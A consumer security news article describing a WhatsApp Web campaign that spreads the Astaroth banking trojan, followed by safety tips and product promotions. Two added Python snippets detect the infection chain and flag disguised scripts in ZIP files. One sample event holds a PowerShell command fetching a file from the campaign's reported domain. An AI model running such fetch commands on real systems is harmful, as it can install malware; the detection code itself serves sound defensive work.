WhatsApp Web Malware Automatically Spreads Banking Trojan
A new malware campaign is weaponizing WhatsApp Web. Security researchers say a banking Trojan linked to Astaroth is now spreading automatically via chat messages, making the attack harder to stop once it starts.
The campaign is known as Boto Cor-de-Rosa. It shows how cybercriminals continue to evolve, especially when they can abuse tools that people rely on every day. This attack targets Windows users and uses WhatsApp Web as both the delivery system and the engine that spreads the infection further.
Attackers abuse WhatsApp Web to spread malware through messages that appear to come from people they trust. (Kurt “CyberGuy” Knutsson)
How this web attack on WhatsApp works
The attack begins with a simple message. A contact sends what looks like a routine ZIP file via WhatsApp. The file name appears random and harmless, which reduces suspicion. Once opened, the ZIP contains a Visual Basic script disguised as a normal document. If the user executes it, the script silently introduces two more pieces of malware. The script then downloads the Astaroth banking malware written in Delphi. It also installs a Python-based module designed to control WhatsApp Web. Both components run in the background without obvious warning signs. From there, the infection becomes self-sustaining.
Malware that spreads through your contacts
What makes this campaign especially dangerous is how it spreads. The Python module scans the victim’s WhatsApp contacts and automatically sends the malicious ZIP file to each conversation. Acronis researchers discovered that the malware adapts its messages depending on the time of day. It sends friendly greetings, making the message seem normal and familiar. The text says: “Here is the requested file. If you have any questions, I am available!” Because the message appears to come from someone you know, many people open it without hesitation.
A single ZIP file sent via chat can silently install banking malware and begin spreading to all contacts. (Kurt “CyberGuy” Knutsson)
Integrated tracking keeps the attack efficient
This malware is carefully designed to monitor its own performance in real time. The propagation tool tracks how many messages are successfully delivered, how many are not delivered, and the overall sending speed measured per minute. After every 50 messages, it generates progress updates showing how many contacts have been reached. This feedback allows attackers to measure success quickly and make adjustments if something stops working.
What happens after infection?
The initial script is heavily obfuscated to avoid detection by antivirus tools. Once executed, it launches PowerShell commands that download more malware from compromised websites. One known domain used in this campaign is coffe-estilo.com. The malware is installed inside a folder that mimics a Microsoft Edge cache directory. Inside are libraries and executable files that make up Astaroth’s entire banking payload. From there, the malware can steal credentials, monitor activity, and potentially access financial accounts.
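For defenders, the chain described above (a script host launching PowerShell that pulls content from the web) can be checked in process-creation telemetry. The following is an added example, not code from the researchers or the original article; the event field names, the sample events and the URL path are constructed for illustration, and only the domain comes from the article.

```python
import ntpath

# Windows script hosts that run .vbs files, and the PowerShell binaries they may spawn.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Domain named in the article; the download hints are generic markers (assumption).
KNOWN_DOMAINS = ("coffe-estilo.com",)
DOWNLOAD_HINTS = ("http://", "https://", "downloadstring", "downloadfile",
                  "invoke-webrequest")

def triage(event):
    """Return the reasons a process-creation event matches the described chain."""
    parent = ntpath.basename(event["parent_image"]).lower()
    child = ntpath.basename(event["image"]).lower()
    cmd = event["command_line"].lower()
    reasons = []
    if parent in SCRIPT_HOSTS and child in POWERSHELL:
        reasons.append("script host spawned PowerShell")
        if any(hint in cmd for hint in DOWNLOAD_HINTS):
            reasons.append("PowerShell command line fetches remote content")
    if any(domain in cmd for domain in KNOWN_DOMAINS):
        reasons.append("command line references a domain reported for this campaign")
    return reasons

# Constructed sample events (not real telemetry); field names are hypothetical.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -c iwr https://coffe-estilo.com/placeholder -OutFile a.zip"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ntpath.basename(ev["image"]), "->", triage(ev) or "no match")
```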
Why WhatsApp Web is abused
WhatsApp Web is popular because it mirrors your phone conversations on a computer. That convenience makes it easier to send messages, share files, and write faster, but it also introduces risks. When you use WhatsApp Web, you link your phone to a browser by scanning a QR code at web.whatsapp.com. Once connected, that browser session becomes a trusted extension of your account. Your chats appear on the screen, the messages you send come from your real number, and incoming messages are synced across both devices.
That configuration is exactly what attackers take advantage of. If the malware gains access to a computer with WhatsApp Web connected, it can act as the user. It can read messages, access contact lists, and send files or links that look completely legitimate. The messages do not raise alarms because they come from a real account, not a fake one.
This is what makes WhatsApp Web an effective malware distribution system. Instead of breaking into WhatsApp, attackers simply abuse an open browser session to automatically spread malicious files. Many users do not realize the danger because WhatsApp Web seems harmless. Sessions are often left logged in on work computers, shared devices, or systems without strong security. In those situations, the malware doesn’t need advanced tricks. It only needs access to a session that is already trusted. That combination of convenience and trust is why WhatsApp Web has become such an attractive target.
Once WhatsApp Web is compromised, the malware can act as the user, sending messages and files that appear completely legitimate. (Kurt “CyberGuy” Knutsson)
How to stay safe from WhatsApp Web malware
Attacks like this WhatsApp Web malware are designed to spread quickly through trusted conversations. Some smart habits can dramatically reduce your risk.
1) Be skeptical of unexpected attachments
Messaging apps seem casual, and that’s exactly why attackers use them. Never open ZIP files sent via chat unless you first confirm with the sender. Be on the lookout for file names made up of random numbers or unknown names. Treat messages that create urgency or feel too familiar as a warning sign. If a file arrives out of nowhere, pause before clicking.
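One way to look inside a ZIP received over chat without extracting or running anything, shown as an added example that is not part of the original article. The extension lists and the double-extension check are assumptions about how a script might be "disguised as a normal document"; the sample archive is constructed and contains only placeholder text.

```python
import io
import zipfile

# Extensions Windows executes as scripts or programs rather than opening as documents.
RISKY_EXT = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".bat", ".cmd",
             ".ps1", ".lnk", ".exe", ".scr", ".msi"}
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}

def inspect_zip(data):
    """List risky members of a ZIP (given as bytes) without extracting anything."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Windows ignores case and trailing dots or spaces in file names.
            name = info.filename.rsplit("/", 1)[-1].lower().rstrip(". ")
            parts = name.split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            if ext not in RISKY_EXT:
                continue
            reason = "executable script or program"
            if len(parts) > 2 and "." + parts[-2] in DOC_EXT:
                reason = "script disguised with a document-style double extension"
            findings.append((info.filename, reason))
    return findings

def build_sample():
    """Constructed sample archive: harmless placeholder content, suspicious names only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("48213907.pdf.vbs", "' placeholder, not a real script")
        zf.writestr("notes/readme.txt", "hello")
        zf.writestr("setup.VBS", "' placeholder")
    return buf.getvalue()

if __name__ == "__main__":
    for member, why in inspect_zip(build_sample()):
        print(f"{member}: {why}")
```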
2) Block web access to WhatsApp
This campaign abuses WhatsApp Web to spread automatically once a device is infected. Check active WhatsApp Web sessions and log out of those you don’t recognize. Avoid leaving your session logged into WhatsApp Web on public or shared computers. Enable two-factor authentication (2FA) within WhatsApp settings. Cutting off WhatsApp Web access helps limit how far the malware can travel.
3) Keep your Windows PC locked and use strong antivirus software
This type of malware takes advantage of systems that are behind on updates. Install Windows updates as soon as they are available. Also, keep your web browser fully updated. Staying up to date closes many of the doors that attackers try to break through. Additionally, use powerful antivirus software that watches for script abuse and PowerShell activity in real time.
The best way to protect yourself from malicious links that install malware and potentially access your private information is to have powerful antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.
Get my picks for the best antivirus protection winners of 2026 for your Windows, Mac, Android, and iOS devices at Cyberguy.com.
4) Limit the amount of your personal data that is online
Banking malware is often accompanied by identity theft and financial fraud. One way to reduce the consequences is to reduce your digital footprint. A data removal service can help remove your personal information from the data broker sites that attackers often target. With less information available, criminals have fewer details to exploit if malware reaches your device.
While no service can guarantee complete removal of your data from the Internet, a data deletion service is truly a smart choice. They are not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to delete your personal data from the Internet. By limiting the information available, you reduce the risk of scammers cross-referencing leak data with information they can find on the dark web, making it harder for them to target you.
Check out my top picks for data removal services and get a free scan to find out if your personal information is already available on the web by visiting Cyberguy.com.
5) Add identity theft protection for additional coverage
Even with strong security habits, financial tracking adds another layer of protection. An identity theft protection service can detect suspicious activity related to your credit and personal data. Identity theft companies can monitor personal information such as your Social Security number (SSN), phone number, and email address, and alert you if it is sold on the dark web or used to open an account. They can also help you freeze your bank and credit card accounts to prevent further unauthorized use by criminals.
You should also turn on alerts for banking and credit card transactions so you’re quickly notified if something seems wrong. The less exposed your data is, the less opportunity attackers have to cause damage.
See my tips and best options on how to protect yourself from identity theft at Cyberguy.com.
6) Slow down and trust your instincts
Most malware infections occur because people act too quickly. If a message doesn’t feel right to you, trust that instinct. Familiar names and friendly language can lower your guard, but they should never replace caution. Take a moment to verify the message or file before opening anything. Attackers depend on trust and urgency to succeed. Slowing down takes away their advantage.
Kurt’s Key Takeaways
This malware campaign on WhatsApp Web is a reminder that cyberattacks no longer rely on obvious red flags. Instead, they integrate into everyday conversations and use familiar tools to spread silently and quickly. What makes this threat especially concerning is how little effort it requires to move from one device to dozens of others. A single click can turn a trusted chat into a distribution system for banking malware and identity theft. The good news is that small changes make a big difference. Pay attention to attachments, block web access to WhatsApp, keep devices updated and reduce Going slow before clicking can stop these attacks in their tracks. As messaging platforms continue to play an increasingly important role in daily life, staying alert is no longer optional. Awareness and simple habits are still some of the strongest defenses you have.
Do you think messaging apps are doing enough to protect users from malware that spreads through trusted conversations? Let us know by writing to us at Cyberguy.com.
Copyright 2026 CyberGuy.com. All rights reserved.
Kurt “CyberGuy” Knutsson is an award-winning technology journalist with a deep love for technology, gear and devices that improve lives with his contributions to News and News Business since mornings on “News & Friends.” Do you have any technical questions? Get Kurt’s free CyberGuy newsletter, share your voice, a story idea or comment on CyberGuy.com.


